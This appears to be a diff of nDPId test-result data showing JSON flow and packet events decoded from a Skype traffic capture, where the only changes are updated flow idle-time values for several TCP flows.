00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":913,"source":"skype.pcap","alias":"nDPId-test","flow_id":149,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969675950,"flow_last_seen":1431969675950,"flow_idle_time":180000,"flow_min_l4_payload_len":51,"flow_max_l4_payload_len":51,"flow_tot_l4_payload_len":51,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1431969675950,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":55159,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00501{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":913,"source":"skype.pcap","alias":"nDPId-test","flow_id":149,"flow_packet_id":1,"flow_last_seen":1431969675950,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":93,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":93,"pkt_l4_len":59,"thread_ts_msec":1431969675950,"pkt":"0NQSxnP1PBXCt3IOCABFAABPisQAAEARbGbAqAEiwKgBAdd3ADUAO4zaTRYBAAABAAAAAAAAAWEGY29uZmlnBXNreXBlDnRyYWZmaWNtYW5hZ2VyA25ldAAAAQAB"} 00784{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":913,"source":"skype.pcap","alias":"nDPId-test","flow_id":149,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969675950,"flow_last_seen":1431969675950,"flow_idle_time":180000,"flow_min_l4_payload_len":51,"flow_max_l4_payload_len":51,"flow_tot_l4_payload_len":51,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1431969675950,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":55159,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Microsoft","breed":"Safe","category":"Web"},"dns": {"query":"a.config.skype.trafficmanager.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} @@ -522,12 +522,12 @@ 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":922,"source":"skype.pcap","alias":"nDPId-test","flow_id":152,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969676429,"flow_last_seen":1431969676429,"flow_idle_time":180000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1431969676429,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.165","src_port":13021,"dst_port":40020,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":922,"source":"skype.pcap","alias":"nDPId-test","flow_id":152,"flow_packet_id":1,"flow_last_seen":1431969676429,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":75,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":75,"pkt_l4_len":41,"thread_ts_msec":1431969676429,"pkt":"0NQSxnP1PBXCt3IOCABFAAA9SBkAAEARs0rAqAEib91NpTLdnFQAKf+JnFIC4bFrPlS3SgwUQ0ZkfJhi4Ibaq\/8x3HMPk6r8UbN8"} 00656{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":922,"source":"skype.pcap","alias":"nDPId-test","flow_id":152,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969676429,"flow_last_seen":1431969676429,"flow_idle_time":180000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1431969676429,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.165","src_port":13021,"dst_port":40020,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":931,"source":"skype.pcap","alias":"nDPId-test","flow_id":153,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969677018,"flow_last_seen":1431969677018,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969677018,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.38","src_port":50063,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":931,"source":"skype.pcap","alias":"nDPId-test","flow_id":153,"flow_packet_id":1,"flow_last_seen":1431969677018,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969677018,"pkt":"0NQSxnP1PBXCt3IOCABFAABAFnhAAEAGqHLAqAEib91KJsOPAbu0bGHpAAAAALAC\/\/+PWgAAAgQFtAEDAwUBAQgKPiMSEQAAAAAEAgAA"} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":931,"source":"skype.pcap","alias":"nDPId-test","flow_id":153,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969677018,"flow_last_seen":1431969677018,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969677018,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.38","src_port":50063,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":931,"source":"skype.pcap","alias":"nDPId-test","flow_id":153,"flow_packet_id":1,"flow_last_seen":1431969677018,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969677018,"pkt":"0NQSxnP1PBXCt3IOCABFAABAFnhAAEAGqHLAqAEib91KJsOPAbu0bGHpAAAAALAC\/\/+PWgAAAgQFtAEDAwUBAQgKPiMSEQAAAAAEAgAA"} 00502{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":932,"source":"skype.pcap","alias":"nDPId-test","flow_id":149,"flow_packet_id":2,"flow_last_seen":1431969677045,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":93,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":93,"pkt_l4_len":59,"thread_ts_msec":1431969677045,"pkt":"0NQSxnP1PBXCt3IOCABFAABP37sAAEARF2\/AqAEiwKgBAdd3ADUAO4zaTRYBAAABAAAAAAAAAWEGY29uZmlnBXNreXBlDnRyYWZmaWNtYW5hZ2VyA25ldAAAAQAB"} 00501{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":933,"source":"skype.pcap","alias":"nDPId-test","flow_id":150,"flow_packet_id":2,"flow_last_seen":1431969677045,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":93,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":93,"pkt_l4_len":59,"thread_ts_msec":1431969677045,"pkt":"0NQSxnP1PBXCt3IOCABFAABPvnQAAEAROLbAqAEiwKgBAfaEADUAO+FnvnsBAAABAAAAAAAAAWEGY29uZmlnBXNreXBlDnRyYWZmaWNtYW5hZ2VyA25ldAAAHAAB"} -00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":936,"source":"skype.pcap","alias":"nDPId-test","flow_id":153,"flow_packet_id":2,"flow_last_seen":1431969677390,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431969677390,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADcGx+5v3UomwKgBIgG7w48O1kHvtGxh6qASOJAkowAAAgQFrAQCCApNf6TaPiMSEQEDAwk="} -00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":937,"source":"skype.pcap","alias":"nDPId-test","flow_id":153,"flow_packet_id":3,"flow_last_seen":1431969677390,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969677390,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0fWFAAEAGQZXAqAEib91KJsOPAbu0bGHqDtZB8IAQECx6WwAAAQEICj4jE4NNf6Ta"} +00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":936,"source":"skype.pcap","alias":"nDPId-test","flow_id":153,"flow_packet_id":2,"flow_last_seen":1431969677390,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431969677390,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADcGx+5v3UomwKgBIgG7w48O1kHvtGxh6qASOJAkowAAAgQFrAQCCApNf6TaPiMSEQEDAwk="} +00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":937,"source":"skype.pcap","alias":"nDPId-test","flow_id":153,"flow_packet_id":3,"flow_last_seen":1431969677390,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969677390,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0fWFAAEAGQZXAqAEib91KJsOPAbu0bGHqDtZB8IAQECx6WwAAAQEICj4jE4NNf6Ta"} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":942,"source":"skype.pcap","alias":"nDPId-test","flow_id":154,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969677439,"flow_last_seen":1431969677439,"flow_idle_time":180000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1431969677439,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.166","src_port":13021,"dst_port":40011,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":942,"source":"skype.pcap","alias":"nDPId-test","flow_id":154,"flow_packet_id":1,"flow_last_seen":1431969677439,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":77,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":77,"pkt_l4_len":43,"thread_ts_msec":1431969677439,"pkt":"0NQSxnP1PBXCt3IOCABFAAA\/kxIAAEARaE7AqAEib91NpjLdnEsAK\/dAnFQCl1hxbJqFe\/EoPOrYejcO5KpAaYBpd\/JMh2XsR696PgE="} 00656{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":942,"source":"skype.pcap","alias":"nDPId-test","flow_id":154,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969677439,"flow_last_seen":1431969677439,"flow_idle_time":180000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1431969677439,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.166","src_port":13021,"dst_port":40011,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} @@ -553,8 +553,8 @@ 00654{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":965,"source":"skype.pcap","alias":"nDPId-test","flow_id":160,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969678448,"flow_last_seen":1431969678448,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1431969678448,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.26","src_port":13021,"dst_port":40004,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} 00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":970,"source":"skype.pcap","alias":"nDPId-test","flow_id":157,"flow_packet_id":2,"flow_last_seen":1431969679026,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":89,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":89,"pkt_l4_len":55,"thread_ts_msec":1431969679026,"pkt":"0NQSxnP1PBXCt3IOCABFAABLE+cAAEAR40fAqAEiwKgBAeRaADUAN2o90\/0BAAABAAAAAAAABHBpcGUDcHJkCXNreXBlZGF0YQZha2FkbnMDbmV0AAABAAE="} 00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":971,"source":"skype.pcap","alias":"nDPId-test","flow_id":158,"flow_packet_id":2,"flow_last_seen":1431969679027,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":89,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":89,"pkt_l4_len":55,"thread_ts_msec":1431969679027,"pkt":"0NQSxnP1PBXCt3IOCABFAABL8bEAAEARBX3AqAEiwKgBAcDQADUANww\/OoYBAAABAAAAAAAABHBpcGUDcHJkCXNreXBlZGF0YQZha2FkbnMDbmV0AAAcAAE="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":975,"source":"skype.pcap","alias":"nDPId-test","flow_id":161,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969679451,"flow_last_seen":1431969679451,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969679451,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.12","src_port":50065,"dst_port":40031,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":975,"source":"skype.pcap","alias":"nDPId-test","flow_id":161,"flow_packet_id":1,"flow_last_seen":1431969679451,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969679451,"pkt":"0NQSxnP1PBXCt3IOCABFAABAZ+RAAEAG8MXAqAEiQTffDMORnF\/vfD8JAAAAALAC\/\/9szQAAAgQFtAEDAwUBAQgKPiMbhwAAAAAEAgAA"} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":975,"source":"skype.pcap","alias":"nDPId-test","flow_id":161,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969679451,"flow_last_seen":1431969679451,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969679451,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.12","src_port":50065,"dst_port":40031,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":975,"source":"skype.pcap","alias":"nDPId-test","flow_id":161,"flow_packet_id":1,"flow_last_seen":1431969679451,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969679451,"pkt":"0NQSxnP1PBXCt3IOCABFAABAZ+RAAEAG8MXAqAEiQTffDMORnF\/vfD8JAAAAALAC\/\/9szQAAAgQFtAEDAwUBAQgKPiMbhwAAAAAEAgAA"} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":976,"source":"skype.pcap","alias":"nDPId-test","flow_id":162,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969679455,"flow_last_seen":1431969679455,"flow_idle_time":180000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1431969679455,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.151","src_port":13021,"dst_port":40017,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":976,"source":"skype.pcap","alias":"nDPId-test","flow_id":162,"flow_packet_id":1,"flow_last_seen":1431969679455,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":72,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":72,"pkt_l4_len":38,"thread_ts_msec":1431969679455,"pkt":"0NQSxnP1PBXCt3IOCABFAAA6zKQAAEARzHXAqAEinTeClzLdnFEAJhOjnF4CtwUXw\/VWCApVJdrfxkhI5qU9AKuGw3faL7f5"} 00656{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":976,"source":"skype.pcap","alias":"nDPId-test","flow_id":162,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969679455,"flow_last_seen":1431969679455,"flow_idle_time":180000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1431969679455,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.151","src_port":13021,"dst_port":40017,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} @@ -564,8 +564,8 @@ 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":978,"source":"skype.pcap","alias":"nDPId-test","flow_id":164,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969679455,"flow_last_seen":1431969679455,"flow_idle_time":180000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":0,"thread_ts_msec":1431969679455,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.176","src_port":13021,"dst_port":40020,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":978,"source":"skype.pcap","alias":"nDPId-test","flow_id":164,"flow_packet_id":1,"flow_last_seen":1431969679455,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":73,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":73,"pkt_l4_len":39,"thread_ts_msec":1431969679455,"pkt":"0NQSxnP1PBXCt3IOCABFAAA7lc0AAEARZY3AqAEib91NsDLdnFQAJ2jKnGICi6AMRljZtq+Es\/pWkLbSJ\/TvDoZrPj0F5hXOgQ=="} 00656{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":978,"source":"skype.pcap","alias":"nDPId-test","flow_id":164,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969679455,"flow_last_seen":1431969679455,"flow_idle_time":180000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":0,"thread_ts_msec":1431969679455,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.176","src_port":13021,"dst_port":40020,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} -00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":979,"source":"skype.pcap","alias":"nDPId-test","flow_id":161,"flow_packet_id":2,"flow_last_seen":1431969679581,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431969679581,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADcGYa5BN98MwKgBIpxfw5E\/Sv9r73w\/CqASOJDLRwAAAgQFrAQCCApNoe2VPiMbhwEDAwk="} -00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":980,"source":"skype.pcap","alias":"nDPId-test","flow_id":161,"flow_packet_id":3,"flow_last_seen":1431969679581,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969679581,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0cmZAAEAG5k\/AqAEiQTffDMORnF\/vfD8KP0r\/bIAQECwh8QAAAQEICj4jHAhNoe2V"} +00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":979,"source":"skype.pcap","alias":"nDPId-test","flow_id":161,"flow_packet_id":2,"flow_last_seen":1431969679581,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431969679581,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADcGYa5BN98MwKgBIpxfw5E\/Sv9r73w\/CqASOJDLRwAAAgQFrAQCCApNoe2VPiMbhwEDAwk="} +00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":980,"source":"skype.pcap","alias":"nDPId-test","flow_id":161,"flow_packet_id":3,"flow_last_seen":1431969679581,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969679581,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0cmZAAEAG5k\/AqAEiQTffDMORnF\/vfD8KP0r\/bIAQECwh8QAAAQEICj4jHAhNoe2V"} 00499{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":989,"source":"skype.pcap","alias":"nDPId-test","flow_id":157,"flow_packet_id":3,"flow_last_seen":1431969680121,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":89,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":89,"pkt_l4_len":55,"thread_ts_msec":1431969680121,"pkt":"0NQSxnP1PBXCt3IOCABFAABLe\/oAAEARezTAqAEiwKgBAeRaADUAN2o90\/0BAAABAAAAAAAABHBpcGUDcHJkCXNreXBlZGF0YQZha2FkbnMDbmV0AAABAAE="} 00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":990,"source":"skype.pcap","alias":"nDPId-test","flow_id":158,"flow_packet_id":3,"flow_last_seen":1431969680121,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":89,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":89,"pkt_l4_len":55,"thread_ts_msec":1431969680121,"pkt":"0NQSxnP1PBXCt3IOCABFAABLZ0MAAEARj+vAqAEiwKgBAcDQADUANww\/OoYBAAABAAAAAAAABHBpcGUDcHJkCXNreXBlZGF0YQZha2FkbnMDbmV0AAAcAAE="} 00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":995,"source":"skype.pcap","alias":"nDPId-test","flow_id":165,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969680467,"flow_last_seen":1431969680467,"flow_idle_time":180000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":1431969680467,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.148","src_port":13021,"dst_port":40010,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} @@ -574,12 +574,12 @@ 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":997,"source":"skype.pcap","alias":"nDPId-test","flow_id":166,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969680467,"flow_last_seen":1431969680467,"flow_idle_time":180000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":0,"thread_ts_msec":1431969680467,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.158","src_port":13021,"dst_port":40031,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":997,"source":"skype.pcap","alias":"nDPId-test","flow_id":166,"flow_packet_id":1,"flow_last_seen":1431969680467,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":64,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":64,"pkt_l4_len":30,"thread_ts_msec":1431969680467,"pkt":"0NQSxnP1PBXCt3IOCABFAAAyVhkAAEAR2gHAqAEinTfrnjLdnF8AHti+nGYCSGBvJFR\/HGq\/K9Cny1\/vxLQHiA=="} 00656{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":997,"source":"skype.pcap","alias":"nDPId-test","flow_id":166,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969680467,"flow_last_seen":1431969680467,"flow_idle_time":180000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":0,"thread_ts_msec":1431969680467,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.158","src_port":13021,"dst_port":40031,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1001,"source":"skype.pcap","alias":"nDPId-test","flow_id":167,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969681060,"flow_last_seen":1431969681060,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969681060,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.12","src_port":50066,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1001,"source":"skype.pcap","alias":"nDPId-test","flow_id":167,"flow_packet_id":1,"flow_last_seen":1431969681060,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969681060,"pkt":"0NQSxnP1PBXCt3IOCABFAABA2fpAAEAGfq\/AqAEiQTffDMOSAbvQogCqAAAAALAC\/\/9eaAAAAgQFtAEDAwUBAQgKPiMhyQAAAAAEAgAA"} -00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1003,"source":"skype.pcap","alias":"nDPId-test","flow_id":167,"flow_packet_id":2,"flow_last_seen":1431969681195,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431969681195,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADcGYa5BN98MwKgBIgG7w5Js9UEp0KIAq6ASOJBL6AAAAgQFrAQCCApNoe8nPiMhyQEDAwk="} -00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1004,"source":"skype.pcap","alias":"nDPId-test","flow_id":167,"flow_packet_id":3,"flow_last_seen":1431969681195,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969681195,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0ayJAAEAG7ZPAqAEiQTffDMOSAbvQogCrbPVBKoAQECyijAAAAQEICj4jIk9Noe8n"} 